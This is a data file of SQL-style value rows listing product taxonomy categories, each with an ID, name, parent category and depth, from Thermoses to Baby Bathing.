(3800,'Thermoses',2920,'Food & Beverage Carriers',3),
(3801,'Surfboard Wax',1143,'Surfing',4),
(3802,'Serving Platters',4026,'Serveware',4),
(3803,'Display Mannequins',138,'Retail',2),
(3805,'Construction Set Toys',1254,'Building Toys',3),
(3806,'Watercraft Propellers',3606,'Watercraft Engine Parts',4),
(3807,'Swim Caps',1144,'Swimming',4),
(3808,'Gymnastics Protective Gear',1000,'Gymnastics',3),
(3809,'Water Bottles',2920,'Food & Beverage Carriers',3),
(3810,'Pilates Machines',999,'Yoga & Pilates',3),
(3811,'Bicycle Trailers',3214,'Bicycle Accessories',4),
(3812,'Vehicle Paint',913,'Vehicle Maintenance, Care & Decor',3),
(3815,'Cricket Bats',1087,'Cricket',3),
(3817,'Lacrosse Sticks',499741,'Field Hockey & Lacrosse',3),
(3819,'Security Safes',359,'Business & Home Security',2),
(3821,'Equestrian Helmets',5594,'Riding Apparel & Accessories',4),
(3825,'Climbing Rope',7059,'Climbing',3),
(3827,'Bicycle Pumps',3214,'Bicycle Accessories',4),
(3828,'Spreaders',3173,'Gardening Tools',4),
(3829,'Basketball Nets',4676,'Basketball Hoop Parts & Accessories',4),
(3831,'Utensil & Flatware Trays',2948,'Kitchen Organizers',4),
(3833,'Brass Knuckles',780,'Weapons',2),
(3835,'Cooling Racks',668,'Kitchen Tools & Utensils',3),
(3838,'Portafilters',3988,'Coffee Maker & Espresso Machine Accessories',4),
(3839,'Darts',1005,'Throwing Darts',3),
(3840,'Wall Clocks',3890,'Clocks',3),
(3841,'Pruning Shears',3173,'Gardening Tools',4),
(3844,'Table Knives',675,'Flatware',4),
(3845,'Pot Racks',2948,'Kitchen Organizers',4),
(3846,'Paper Napkins',2530,'Household Paper Products',3),
(3847,'Foosball Tables',1007,'Foosball',3),
(3848,'Refrigerator Accessories',2901,'Kitchen Appliance Accessories',3),
(3849,'Quickdraws',7059,'Climbing',3),
(3850,'Cookie Cutters',668,'Kitchen Tools & Utensils',3),
(3852,'Wrestling Uniforms',3598,'Sports Uniforms',4),
(3855,'Outdoor Grill Covers',3684,'Outdoor Grill Accessories',4),
(3858,'Weight Lifting Gloves & Hand Supports',499793,'Weight Lifting',3),
(3859,'Fishing Floats',499823,'Fishing Tackle',4),
(3860,'Sorting & Stacking Toys',2847,'Baby Toys & Activity Equipment',2),
(3862,'Humidifier Accessories',3348,'Household Appliance Accessories',2),
(3864,'High Jump Pits',1060,'Track & Field',3),
(3865,'Sports Collectibles',216,'Collectibles',3),
(3866,'Watercraft Cleaners',1122,'Watercraft Care',4),
(3867,'Puzzles',1239,'Toys & Games',1),
(3868,'Bicycle Trainers',3214,'Bicycle Accessories',4),
(3869,'Skateboard Decks',3670,'Skateboard Parts',4),
(3870,'Cricket Balls',1087,'Cricket',3),
(3871,'Post Cards',956,'Paper Products',3),
(3873,'Home Alarm Systems',359,'Business & Home Security',2),
(3874,'Bubble Blowing Toys',4352,'Activity Toys',3),
(3877,'Sports Megaphones',499799,'General Purpose Athletic Equipment',3),
(3878,'Relay Batons',1060,'Track & Field',3),
(3879,'Bicycle Bells & Horns',3214,'Bicycle Accessories',4),
(3880,'Throwing Hammers',1060,'Track & Field',3),
(3881,'Rugby Posts',1110,'Rugby',3),
(3882,'Guitar Cases & Gig Bags',3502,'Guitar Accessories',5),
(3883,'Archery Targets',1033,'Archery',4),
(3885,'Model Rocketry',5999,'Model Making',3),
(3888,'Football Uniforms',3598,'Sports Uniforms',4),
(3889,'Circuit Prototyping',3702,'Circuit Boards & Components',2),
(3890,'Clocks',696,'Decor',2),
(3892,'Watercraft Fuel Pumps & Parts',3400,'Watercraft Fuel Systems',4),
(3893,'Vintage Advertisements',216,'Collectibles',3),
(3894,'Windsurfing Boards',1148,'Windsurfing',4),
(3895,'GPS Accessories',222,'Electronics',1),
(3898,'Air Fresheners',592,'Home Fragrances',3),
(3899,'Dock Steps',3315,'Docking & Anchoring',4),
(3900,'Ping Pong Paddle Accessories',1008,'Ping Pong',3),
(3905,'Blood Glucose Test Strips',3688,'Blood Glucose Meter Accessories',4),
(3906,'Tennis Racquets',1065,'Tennis',3),
(3907,'Shuttlecocks',1062,'Badminton',4),
(3908,'Windsurfing Board Fins',3624,'Windsurfing Board Parts',5),
(3909,'Footbags',1266,'Sports Toys',3),
(3910,'Billiard Cues & Bridges',1003,'Billiards',3),
(3911,'Bath Toys',1253,'Toys',2),
(3912,'Microphone Stands',1420,'Audio Accessories',3),
(3913,'Belt Buckles',167,'Clothing Accessories',2),
(3914,'Salad Spinners',668,'Kitchen Tools & Utensils',3),
(3916,'Chewing Tobacco',435,'Tobacco Products',2),
(3919,'Work Benches',3974,'Tool Storage & Organization',3),
(3922,'Tennis Racquet String',3658,'Tennis Racquet Accessories',4),
(3923,'Prayer Beads',97,'Religious Items',2),
(3924,'Staff & Stick Weapons',780,'Weapons',2),
(3925,'Airsoft Pellets',2443,'Airsoft',5),
(3928,'Bug Collecting Kits',1262,'Educational Toys',3),
(3929,'Yo',4352,'Activity Toys',3),
(3931,'Golf Carts',1267,'Motor Vehicles',3),
(3932,'Mattocks & Pickaxes',1167,'Tools',2),
(3937,'Camping Tools',1013,'Camping & Hiking',3),
(3938,'Medicine Balls',990,'Exercise & Fitness',2),
(3939,'Spoons',675,'Flatware',4),
(3941,'Tureens',4026,'Serveware',4),
(3943,'Hockey Toys',1266,'Sports Toys',3),
(3944,'Drill & Screwdriver Accessories',3650,'Tool Accessories',2),
(3945,'Microphone Preamps',246,'Signal Processors',4),
(3946,'Pinball Machine Accessories',3356,'Arcade Equipment',2),
(3948,'Stilts',1249,'Outdoor Play Equipment',2),
(3949,'Microcontrollers',3991,'Semiconductors',3),
(3950,'Badminton Racquets & Sets',1062,'Badminton',4),
(3951,'Football Pants',5322,'Activewear',3),
(3953,'Cheerleading Pom Poms',3354,'Cheerleading',3),
(3954,'Deep Fryer Accessories',2901,'Kitchen Appliance Accessories',3),
(3955,'Watercraft Polishes',1122,'Watercraft Care',4),
(3956,'Wax Paper',3110,'Food Wraps',4),
(3957,'Dart Backboards',1005,'Throwing Darts',3),
(3958,'Hockey Uniforms',3598,'Sports Uniforms',4),
(3961,'Tennis Nets',1065,'Tennis',3),
(3964,'Ping Pong Balls',1008,'Ping Pong',3),
(3965,'Nut Butters',5740,'Dips & Spreads',3),
(3966,'Air & Water Rockets',1261,'Flying Toys',3),
(3968,'Watercraft Fuel Meters',3400,'Watercraft Fuel Systems',4),
(3970,'Lacrosse Goals',499741,'Field Hockey & Lacrosse',3),
(3971,'Grip Spray & Chalk',499799,'General Purpose Athletic Equipment',3),
(3973,'Soccer Corner Flags',1111,'Soccer',3),
(3974,'Tool Storage & Organization',2878,'Hardware Accessories',2),
(3977,'Aircraft Parts & Accessories',5613,'Vehicle Parts & Accessories',2),
(3980,'Tool Boxes',3974,'Tool Storage & Organization',3),
(3982,'Cycling Apparel & Accessories',1025,'Cycling',3),
(3983,'Rugby Training Aids',1110,'Rugby',3),
(3985,'Tennis Ball Machines',1065,'Tennis',3),
(3987,'Pole Vault Pits',1060,'Track & Field',3),
(3988,'Coffee Maker & Espresso Machine Accessories',2901,'Kitchen Appliance Accessories',3),
(3991,'Semiconductors',3702,'Circuit Boards & Components',2),
(3992,'Saunas',729,'Pool & Spa',2),
(3993,'Disc Golf Bags',3484,'Disc Golf',4),
(3994,'PiÃ±atas',96,'Party Supplies',3),
(3995,'Watercraft Steering Parts',3391,'Watercraft Parts & Accessories',3),
(3996,'Table Shuffleboard Powder',1009,'Table Shuffleboard',3),
(3997,'Starter Pistols',1060,'Track & Field',3),
(3998,'Football Training Equipment',1093,'Football',3),
(3999,'Mortars & Pestles',668,'Kitchen Tools & Utensils',3),
(4000,'Cultivating Tools',3173,'Gardening Tools',4),
(4002,'Squash Racquets',503752,'Racquetball & Squash',3),
(4003,'Martial Arts Uniforms',3598,'Sports Uniforms',4),
(4004,'Pretend Housekeeping',3229,'Pretend Play',3),
(4005,'Tongs',668,'Kitchen Tools & Utensils',3),
(4006,'Hockey Fan Accessories',3515,'Sports Fan Accessories',5),
(4008,'Boxing & Martial Arts Protective Gear',499719,'Boxing & Martial Arts',3),
(4009,'Serving Trays',4026,'Serveware',4),
(4010,'Breadboards',3889,'Circuit Prototyping',3),
(4011,'Mechanical Puzzles',3867,'Puzzles',2),
(4015,'Forks',675,'Flatware',4),
(4016,'Wire & Cable Ties',3328,'Cable Management',3),
(4018,'Bridle Bits',5593,'Horse Tack',4),
(4019,'Skate Blade Guards',3791,'Ice Skate Parts & Accessories',4),
(4020,'Vaulting Poles',1060,'Track & Field',3),
(4021,'Table Shuffleboard Pucks',1009,'Table Shuffleboard',3),
(4022,'Altimeters',1305,'Measuring Tools & Sensors',3),
(4023,'Parachutes',3789,'Hang Gliding & Skydiving',3),
(4024,'Disposable Cameras',142,'Cameras',2),
(4026,'Serveware',672,'Tableware',3),
(4027,'Motor Vehicle Trailers',8237,'Vehicle Storage & Cargo',3),
(4031,'Tool Sheaths',3974,'Tool Storage & Organization',3),
(4032,'Decorative Stamps',505392,'Craft Measuring & Marking Tools',5),
(4035,'FM Transmitters',5129,'Audio Transmitters',4),
(4036,'Laboratory Flasks',4255,'Laboratory Supplies',3),
(4037,'Horse & Livestock Trailers',4027,'Motor Vehicle Trailers',4),
(4040,'Scopes',156,'Optics',2),
(4043,'Golf Club Headcovers',3642,'Golf Club Parts & Accessories',4),
(4044,'Utility & Cargo Trailers',4027,'Motor Vehicle Trailers',4),
(4049,'Shower Caps',474,'Bath & Body',4),
(4050,'Basketball Hoop Posts',4676,'Basketball Hoop Parts & Accessories',4),
(4054,'Decorative Stickers',505379,'Embellishments & Trims',5),
(4055,'Paper Coin Wrappers & Bill Straps',4181,'Money Handling',3),
(4056,'White Noise Machines',4076,'Sleeping Aids',3),
(4057,'Hair Extensions',171,'Hair Accessories',3),
(4060,'Erotic Magazines',773,'Erotic',2),
(4061,'Graduated Cylinders',4255,'Laboratory Supplies',3),
(4063,'Armoires & Wardrobes',6356,'Cabinets & Storage',2),
(4070,'Neon Signs',4297,'Electric Signs',3),
(4072,'Tattooing Needles',4326,'Tattooing Supplies',3),
(4073,'Glue Guns',504639,'Art & Crafting Tools',4),
(4074,'pH Meters',1305,'Measuring Tools & Sensors',3),
(4075,'Pipettes',4255,'Laboratory Supplies',3),
(4076,'Sleeping Aids',2915,'Personal Care',2),
(4077,'Towels',4171,'Linens & Bedding',2),
(4080,'Folding Tables',6392,'Tables',2),
(4081,'Bubble Levels',1191,'Levels',4),
(4082,'Ashtrays',600,'Smoking Accessories',2),
(4085,'Composting',2962,'Gardening',3),
(4086,'Binder Accessories',4312,'Binding Supplies',3),
(4089,'Basketball Backboards',4676,'Basketball Hoop Parts & Accessories',4),
(4091,'Vaporizers & Electronic Cigarettes',435,'Tobacco Products',2),
(4093,'Soccer Autographed Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(4095,'Multifunction Tools & Knives',3937,'Camping Tools',4),
(4096,'Food Service Baskets',135,'Food Service',2),
(4102,'Laptop Replacement Screens',4224,'Laptop Parts',4),
(4105,'Sunloungers',6368,'Outdoor Seating',3),
(4106,'Makeup Sponges',2548,'Makeup Tools',5),
(4111,'Guitar Picks',3502,'Guitar Accessories',5),
(4116,'Autoclaves',4335,'Laboratory Equipment',3),
(4117,'Shipping Tags',960,'Labels & Tags',3),
(4121,'Facial Blotting Paper',2548,'Makeup Tools',5),
(4122,'Piercing Needles',4350,'Piercing Supplies',3),
(4124,'Football Autographed Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(4126,'Beach Towels',4077,'Towels',3),
(4127,'Pricing Guns',138,'Retail',2),
(4131,'LED Signs',4297,'Electric Signs',3),
(4132,'Power Trowels',1193,'Masonry Tools',3),
(4133,'Laboratory Hot Plates',4335,'Laboratory Equipment',3),
(4136,'Spotting Scopes',4040,'Scopes',3),
(4137,'Label Clips',960,'Labels & Tags',3),
(4140,'Wash Bottles',4255,'Laboratory Supplies',3),
(4142,'Music Stands',55,'Musical Instrument & Orchestra Accessories',3),
(4143,'Tablecloths',601,'Table Linens',3),
(4144,'Hockey Autographed Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(4145,'Bicycle Cages',3214,'Bicycle Accessories',4),
(4148,'Vanities',6356,'Cabinets & Storage',2),
(4149,'Baseball & Softball Autographed Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(4151,'Coin & Bill Counters',4181,'Money Handling',3),
(4154,'Folder Tabs',960,'Labels & Tags',3),
(4155,'Test Tube Racks',4255,'Laboratory Supplies',3),
(4160,'Retail Display Cases',138,'Retail',2),
(4161,'Ice Makers',730,'Kitchen Appliances',3),
(4163,'Room Dividers',436,'Furniture',1),
(4164,'Monoculars',156,'Optics',2),
(4167,'Flying Discs',1266,'Sports Toys',3),
(4171,'Linens & Bedding',536,'Home & Garden',1),
(4174,'Zippers',505380,'Craft Fasteners & Closures',5),
(4175,'Scale Model Kits',5999,'Model Making',3),
(4177,'Coiled Spring Toys',4352,'Activity Toys',3),
(4179,'Pinback Buttons',167,'Clothing Accessories',2),
(4180,'Auto Racing Autographed Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(4181,'Money Handling',138,'Retail',2),
(4182,'Binding Combs & Spines',4312,'Binding Supplies',3),
(4183,'Index Dividers',4086,'Binder Accessories',4),
(4191,'Desks',6362,'Office Furniture',2),
(4192,'Basketball Rims',4676,'Basketball Hoop Parts & Accessories',4),
(4194,'Bicycle Seatposts',3618,'Bicycle Parts',4),
(4195,'Dressers',6356,'Cabinets & Storage',2),
(4199,'Garden Hose Storage',3974,'Tool Storage & Organization',3),
(4200,'Shipping Labels',960,'Labels & Tags',3),
(4201,'Garden Hose Spray Nozzles',3568,'Watering & Irrigation',3),
(4203,'Cloth Napkins',601,'Table Linens',3),
(4205,'Storage Chests',6356,'Cabinets & Storage',2),
(4211,'Travel Pillows',4076,'Sleeping Aids',3),
(4212,'Binder Rings',4086,'Binder Accessories',4),
(4214,'Decorative Nutcrackers',3685,'Nutcrackers',5),
(4215,'Tattooing Inks',4326,'Tattooing Supplies',3),
(4216,'Toy Jacks',4352,'Activity Toys',3),
(4217,'Bus Tubs',135,'Food Service',2),
(4218,'False Nails',478,'Nail Care',4),
(4220,'Fly Swatters',728,'Pest Control',3),
(4222,'Bar Ice Picks',651,'Cocktail Shakers & Tools',4),
(4224,'Laptop Parts',285,'Computer Components',3),
(4226,'Buttons & Snaps',505380,'Craft Fasteners & Closures',5),
(4231,'Laboratory Ovens',4335,'Laboratory Equipment',3),
(4233,'Trunks',696,'Decor',2),
(4237,'Photo Storage Boxes',4360,'Photo Storage',4),
(4240,'Vehicle Cargo Racks',3472,'Motor Vehicle Carrying Racks',4),
(4241,'Vanity Benches',441,'Benches',2),
(4243,'Travel Trailers',4027,'Motor Vehicle Trailers',4),
(4244,'Clothing Display Racks',138,'Retail',2),
(4245,'Otoscopes & Ophthalmoscopes',3477,'Medical Equipment',3),
(4247,'Can Crushers',668,'Kitchen Tools & Utensils',3),
(4248,'Crutches',5164,'Walking Aids',4),
(4254,'Golf Club Grips',3642,'Golf Club Parts & Accessories',4),
(4255,'Laboratory Supplies',1624,'Science & Laboratory',2),
(4257,'Kitchen Towels',4077,'Towels',3),
(4268,'Toy Chests',4205,'Storage Chests',3),
(4270,'Laptop Housings & Trim',4224,'Laptop Parts',4),
(4274,'Thermal Optic Accessories',160,'Optic Accessories',3),
(4276,'Petri Dishes',4255,'Laboratory Supplies',3),
(4279,'Basketball Autographed Paraphernalia',4333,'Autographed Sports Paraphernalia',5),
(4282,'Martial Arts Weapons',499719,'Boxing & Martial Arts',3),
(4283,'Cash Drawers & Trays',505825,'Cash Register & POS Terminal Accessories',4),
(4285,'Piercing & Tattooing',111,'Business & Industrial',1),
(4290,'Banknote Verifiers',4181,'Money Handling',3),
(4292,'Steam Tables',5103,'Food Warmers',4),
(4294,'Sight Levels',1191,'Levels',4),
(4295,'Piggy Banks & Money Jars',696,'Decor',2),
(4297,'Electric Signs',976,'Signage',2),
(4299,'Outdoor Furniture',436,'Furniture',1),
(4301,'Laptop Replacement Keyboards',4224,'Laptop Parts',4),
(4303,'Binders',4312,'Binding Supplies',3),
(4306,'Test Tubes',4255,'Laboratory Supplies',3),
(4310,'Beakers',4255,'Laboratory Supplies',3),
(4312,'Binding Supplies',923,'Filing & Organization',2),
(4313,'Eye Masks',4076,'Sleeping Aids',3),
(4316,'Toothpicks',526,'Oral Care',3),
(4317,'Conference Room Tables',6363,'Workspace Tables',3),
(4322,'Toothpick Holders & Dispensers',2948,'Kitchen Organizers',4),
(4325,'Compactors',1167,'Tools',2),
(4326,'Tattooing Supplies',4285,'Piercing & Tattooing',2),
(4327,'Hang Gliders',3789,'Hang Gliding & Skydiving',3),
(4329,'Money Deposit Bags',4181,'Money Handling',3),
(4332,'Pastry Blenders',668,'Kitchen Tools & Utensils',3),
(4333,'Autographed Sports Paraphernalia',3865,'Sports Collectibles',4),
(4334,'Spoon Rests',668,'Kitchen Tools & Utensils',3),
(4335,'Laboratory Equipment',1624,'Science & Laboratory',2),
(4336,'Centrifuges',4335,'Laboratory Equipment',3),
(4340,'Theodolites',1305,'Measuring Tools & Sensors',3),
(4341,'Office Rubber Stamps',2986,'Office Instruments',2),
(4343,'Doilies',601,'Table Linens',3),
(4350,'Piercing Supplies',4285,'Piercing & Tattooing',2),
(4351,'Spray String',96,'Party Supplies',3),
(4352,'Activity Toys',1253,'Toys',2),
(4355,'Kitchen & Dining Room Tables',6392,'Tables',2),
(4358,'Parasols & Rain Umbrellas',536,'Home & Garden',1),
(4360,'Photo Storage',636,'Storage & Organization',3),
(4364,'Stethoscopes',3477,'Medical Equipment',3),
(4366,'Bath Pillows',574,'Bathroom Accessories',2),
(4368,'Photo Negative & Slide Storage',39,'Photography',2),
(4372,'Cake Stands',4026,'Serveware',4),
(4375,'Window Screens',603,'Window Treatments',3),
(4377,'Address Labels',960,'Labels & Tags',3),
(4379,'Tattooing Machines',4326,'Tattooing Supplies',3),
(4386,'Baby Transport Accessories',537,'Baby & Toddler',1),
(4387,'Baby Stroller Accessories',4386,'Baby Transport Accessories',2),
(4415,'Radio Scanners',2471,'Communication Radios',3),
(4416,'Lens Converters',2911,'Camera Lens Accessories',3),
(4417,'Hard Drive Docks',1623,'Hard Drive Accessories',5),
(4418,'Coffee Creamer',428,'Dairy Products',3),
(4419,'Sanding Blocks',1167,'Tools',2),
(4420,'Mattress Encasements',4452,'Mattress Protectors',4),
(4421,'Electric Skillets & Woks',730,'Kitchen Appliances',3),
(4423,'SautÃ© Pans',654,'Cookware',4),
(4424,'Cookware Accessories',6070,'Cookware & Bakeware',3),
(4427,'Wok Accessories',4424,'Cookware Accessories',4),
(4432,'Camera Lenses',149,'Camera & Video Camera Lenses',3),
(4433,'Cat Beds',4,'Cat Supplies',3),
(4434,'Dog Beds',5,'Dog Supplies',3),
(4435,'Homecare & Hospital Beds',5167,'Medical Furniture',3),
(4437,'Bed & Bed Frame Accessories',6433,'Beds & Accessories',2),
(4441,'Lens Bags',2911,'Camera Lens Accessories',3),
(4450,'Marine Radios',340,'Marine Electronics',2),
(4451,'Air Mattress & Sleeping Pad Accessories',1014,'Camp Furniture',4),
(4452,'Mattress Protectors',569,'Bedding',3),
(4453,'Chair & Sofa Cushions',696,'Decor',2),
(4454,'Throw Pillows',696,'Decor',2),
(4456,'Backrest Pillows',696,'Decor',2),
(4458,'TV & Monitor Mounts',403,'Television Parts & Accessories',4),
(4459,'Paella Pans',654,'Cookware',4),
(4463,'Audio & Video Cable Adapters & Couplers',258,'Adapters',3),
(4465,'Wireless Presenters',964,'Presentation Supplies',2),
(4466,'Golf Gloves',1043,'Golf',3),
(4467,'Golf Towels',1043,'Golf',3),
(4468,'Garage Doors',119,'Doors',3),
(4469,'Pull Chains',502977,'Chain, Wire & Rope',3),
(4470,'Writing & Drawing Instrument Accessories',2986,'Office Instruments',2),
(4471,'Pen Ink & Refills',4470,'Writing & Drawing Instrument Accessories',3),
(4472,'Pencil Lead & Refills',4470,'Writing & Drawing Instrument Accessories',3),
(4474,'Laboratory Blenders',4335,'Laboratory Equipment',3),
(4475,'Hair Dryer Accessories',6018,'Hair Styling Tool Accessories',4),
(4482,'Mochi Makers',730,'Kitchen Appliances',3),
(4483,'Futon Dryers',604,'Household Appliances',2),
(4484,'Kotatsu',6392,'Tables',2),
(4485,'Ventilation Fans',608,'Fans',4),
(4486,'Baby & Toddler Car Seat Accessories',4386,'Baby Transport Accessories',2),
(4487,'Sanding Accessories',3650,'Tool Accessories',2),
(4488,'Toll Collection Devices',222,'Electronics',1),
(4490,'Earthquake Alarms',5835,'Emergency Preparedness',2),
(4491,'Furniture Anchors',5835,'Emergency Preparedness',2),
(4492,'Document Cameras',964,'Presentation Supplies',2),
(4493,'Headphone Amplifiers',224,'Audio Amplifiers',4),
(4495,'Roaster Ovens & Rotisseries',730,'Kitchen Appliances',3),
(4497,'Pet Doors',2,'Pet Supplies',2),
(4499,'Staple Removers',2986,'Office Instruments',2),
(4500,'Coffee Filter Baskets',3988,'Coffee Maker & Espresso Machine Accessories',4),
(4501,'Pressure Cooker & Canner Accessories',4424,'Cookware Accessories',4),
(4502,'Bakeware Accessories',6070,'Cookware & Bakeware',3),
(4503,'Baking Mats & Liners',4502,'Bakeware Accessories',4),
(4506,'Infrared Thermometers',1305,'Measuring Tools & Sensors',3),
(4507,'Hair Removal',528,'Shaving & Grooming',3),
(4508,'Depilatories',4507,'Hair Removal',4),
(4509,'Electrolysis Devices',4507,'Hair Removal',4),
(4510,'Epilators',4507,'Hair Removal',4),
(4511,'Waxing Kits & Supplies',4507,'Hair Removal',4),
(4512,'Numeric Keypads',1928,'Input Devices',4),
(4513,'Outdoor Sofas',6368,'Outdoor Seating',3),
(4515,'Dustpans',623,'Household Cleaning Supplies',3),
(4516,'Waste Containment',630,'Household Supplies',2),
(4517,'Recycling Containers',4516,'Waste Containment',3),
(4519,'Juicer Accessories',2901,'Kitchen Appliance Accessories',3),
(4520,'Drink Sleeves',2920,'Food & Beverage Carriers',3),
(4521,'Can & Bottle Sleeves',4520,'Drink Sleeves',4),
(4522,'Cup Sleeves',4520,'Drink Sleeves',4),
(4525,'Golf Bag Covers & Cases',4605,'Golf Bag Accessories',4),
(4527,'Eye Wash Supplies',508,'First Aid',3),
(4528,'Tea Makers',730,'Kitchen Appliances',3),
(4529,'Steamer Baskets',4424,'Cookware Accessories',4),
(4530,'Mixing Bowls',668,'Kitchen Tools & Utensils',3),
(4532,'Food Cookers & Steamers',730,'Kitchen Appliances',3),
(4537,'Golf Bag Carts',4605,'Golf Bag Accessories',4),
(4539,'Wine Fridges',730,'Kitchen Appliances',3),
(4540,'Bassoons',87,'Woodwinds',4),
(4541,'Oboes & English Horns',87,'Woodwinds',4),
(4544,'Gutter Accessories',123,'Roofing',3),
(4546,'Alarm Clocks',3890,'Clocks',3),
(4548,'Floor & Steam Cleaner Accessories',3348,'Household Appliance Accessories',2),
(4550,'Mobile Phone Charms & Straps',264,'Mobile Phone Accessories',4),
(4551,'Respiratory Care',491,'Health Care',2),
(4552,'Nebulizers',4551,'Respiratory Care',3),
(4554,'Portable Electronic Games',3793,'Games',2),
(4555,'Microscope Accessories',4335,'Laboratory Equipment',3),
(4556,'Microscope Eyepieces & Adapters',4555,'Microscope Accessories',4),
(4557,'Microscope Cameras',4555,'Microscope Accessories',4),
(4558,'Microscope Slides',4555,'Microscope Accessories',4),
(4559,'Tea Strainers',668,'Kitchen Tools & Utensils',3),
(4560,'Outdoor Grill Spits & Baskets',3684,'Outdoor Grill Accessories',4),
(4562,'Bottle Stoppers & Savers',649,'Barware',3),
(4563,'Wine Aerators',649,'Barware',3),
(4564,'Outdoor Power Equipment Accessories',689,'Lawn & Garden',2),
(4565,'Chainsaw Accessories',4564,'Outdoor Power Equipment Accessories',3),
(4566,'Lawn Mower Accessories',4564,'Outdoor Power Equipment Accessories',3),
(4567,'Snow Blower Accessories',4564,'Outdoor Power Equipment Accessories',3),
(4569,'Hair Iron Accessories',6018,'Hair Styling Tool Accessories',4),
(4570,'Projection Screen Stands',393,'Projector Accessories',4),
(4571,'Bicycle Tires',3618,'Bicycle Parts',4),
(4572,'Bicycle Tubes',3618,'Bicycle Parts',4),
(4574,'Bicycle Brake Calipers',3740,'Bicycle Brake Parts',5),
(4575,'Bicycle Brake Levers',3740,'Bicycle Brake Parts',5),
(4576,'Bicycle Brake Rotors',3740,'Bicycle Brake Parts',5),
(4577,'Bicycle Brake Sets',3740,'Bicycle Brake Parts',5),
(4579,'Sewing Machine Needles',505393,'Needles & Hooks',5),
(4580,'Craft Machine Cases & Covers',504643,'Art & Crafting Tool Accessories',4),
(4582,'Bicycle Handlebars',3618,'Bicycle Parts',4),
(4583,'Bicycle Stems',3618,'Bicycle Parts',4),
(4585,'Bicycle Drivetrain Parts',3618,'Bicycle Parts',4),
(4586,'Bicycle Cassettes & Freewheels',4585,'Bicycle Drivetrain Parts',5),
(4587,'Bicycle Chains',4585,'Bicycle Drivetrain Parts',5),
(4588,'Bicycle Derailleurs',4585,'Bicycle Drivetrain Parts',5),
(4589,'Cardio Machines',499792,'Cardio',3),
(4590,'Bicycle Bottom Brackets',4585,'Bicycle Drivetrain Parts',5),
(4591,'Bicycle Chainrings',4585,'Bicycle Drivetrain Parts',5),
(4592,'Bicycle Cranks',4585,'Bicycle Drivetrain Parts',5),
(4593,'Bicycle Pedals',4585,'Bicycle Drivetrain Parts',5),
(4594,'Bicycle Shifters',4585,'Bicycle Drivetrain Parts',5),
(4595,'Bicycle Seatpost Clamps',3618,'Bicycle Parts',4),
(4596,'Bicycle Small Parts',3618,'Bicycle Parts',4),
(4597,'Bicycle Wheel Parts',3618,'Bicycle Parts',4),
(4598,'Cardio Machine Accessories',499792,'Cardio',3),
(4599,'Bicycle Hubs',4597,'Bicycle Wheel Parts',5),
(4600,'Bicycle Spokes',4597,'Bicycle Wheel Parts',5),
(4601,'Bicycle Wheel Nipples',4597,'Bicycle Wheel Parts',5),
(4602,'Bicycle Wheel Rims',4597,'Bicycle Wheel Parts',5),
(4603,'Bicycle Forks',3618,'Bicycle Parts',4),
(4605,'Golf Bag Accessories',1043,'Golf',3),
(4608,'Seasonings & Spices',422,'Food Items',2),
(4610,'MSG',4608,'Seasonings & Spices',3),
(4611,'Salt',4608,'Seasonings & Spices',3),
(4613,'Bean Paste',2660,'Cooking & Baking Ingredients',3),
(4614,'Hot Sauce',427,'Condiments & Sauces',3),
(4615,'Satay Sauce',427,'Condiments & Sauces',3),
(4616,'Soy Sauce',427,'Condiments & Sauces',3),
(4617,'Electronics Cleaners',2082,'Electronics Accessories',2),
(4627,'Eggs',432,'Meat, Seafood & Eggs',3),
(4628,'Meat',432,'Meat, Seafood & Eggs',3),
(4629,'Seafood',432,'Meat, Seafood & Eggs',3),
(4630,'Cake Decorating Supplies',668,'Kitchen Tools & Utensils',3),
(4631,'Percussion Mallets',3465,'Percussion Accessories',4),
(4632,'Disposable Tableware',135,'Food Service',2),
(4633,'Scroll Saws',1235,'Saws',3),
(4634,'Home Doors',119,'Doors',3),
(4636,'Lamps',594,'Lighting',2),
(4638,'Tripod & Monopod Accessories',2096,'Camera & Optic Accessories',2),
(4639,'Tripod & Monopod Heads',4638,'Tripod & Monopod Accessories',3),
(4640,'Tripod & Monopod Cases',4638,'Tripod & Monopod Accessories',3),
(4641,'Lawn Mower Blades',4566,'Lawn Mower Accessories',4),
(4642,'Lawn Mower Covers',4566,'Lawn Mower Accessories',4),
(4643,'Lawn Mower Belts',4566,'Lawn Mower Accessories',4),
(4644,'Lawn Mower Pulleys & Idlers',4566,'Lawn Mower Accessories',4),
(4645,'Lawn Mower Bags',4566,'Lawn Mower Accessories',4),
(4646,'Chainsaw Chains',4565,'Chainsaw Accessories',4),
(4647,'Chainsaw Bars',4565,'Chainsaw Accessories',4),
(4648,'Game Timers',1239,'Toys & Games',1),
(4650,'Patio Heater Accessories',3348,'Household Appliance Accessories',2),
(4651,'Patio Heater Covers',4650,'Patio Heater Accessories',3),
(4652,'Jukeboxes',242,'Audio Players & Recorders',3),
(4653,'Food Dehydrator Accessories',2901,'Kitchen Appliance Accessories',3),
(4654,'Food Dehydrator Trays',4653,'Food Dehydrator Accessories',4),
(4655,'Food Dehydrator Sheets',4653,'Food Dehydrator Accessories',4),
(4656,'Ironing Board Pads & Covers',627,'Laundry Supplies',3),
(4657,'Fabric Stain Removers',627,'Laundry Supplies',3),
(4658,'Tool Stands',3650,'Tool Accessories',2),
(4659,'Saw Stands',4658,'Tool Stands',3),
(4660,'Pot & Pan Lids',4424,'Cookware Accessories',4),
(4661,'Pot & Pan Handles',4424,'Cookware Accessories',4),
(4662,'Wok Rings',4427,'Wok Accessories',5),
(4663,'Wok Brushes',4427,'Wok Accessories',5),
(4664,'Microscope Replacement Bulbs',4555,'Microscope Accessories',4),
(4665,'Microscope Objective Lenses',4555,'Microscope Accessories',4),
(4666,'Conference Phones',270,'Telephony',3),
(4667,'Dehumidifier Accessories',3348,'Household Appliance Accessories',2),
(4669,'Exercise Equipment Mats',990,'Exercise & Fitness',2),
(4670,'Scrub Brushes',623,'Household Cleaning Supplies',3),
(4671,'Broom & Mop Handles',623,'Household Cleaning Supplies',3),
(4672,'Concrete Brooms',1167,'Tools',2),
(4674,'Ice Cream Maker Accessories',2901,'Kitchen Appliance Accessories',3),
(4675,'Ice Cream Maker Freezer Bowls',4674,'Ice Cream Maker Accessories',4),
(4676,'Basketball Hoop Parts & Accessories',1081,'Basketball',3),
(4677,'Carpet Sweepers',623,'Household Cleaning Supplies',3),
(4678,'Baby Bathing',537,'Baby & Toddler',1),
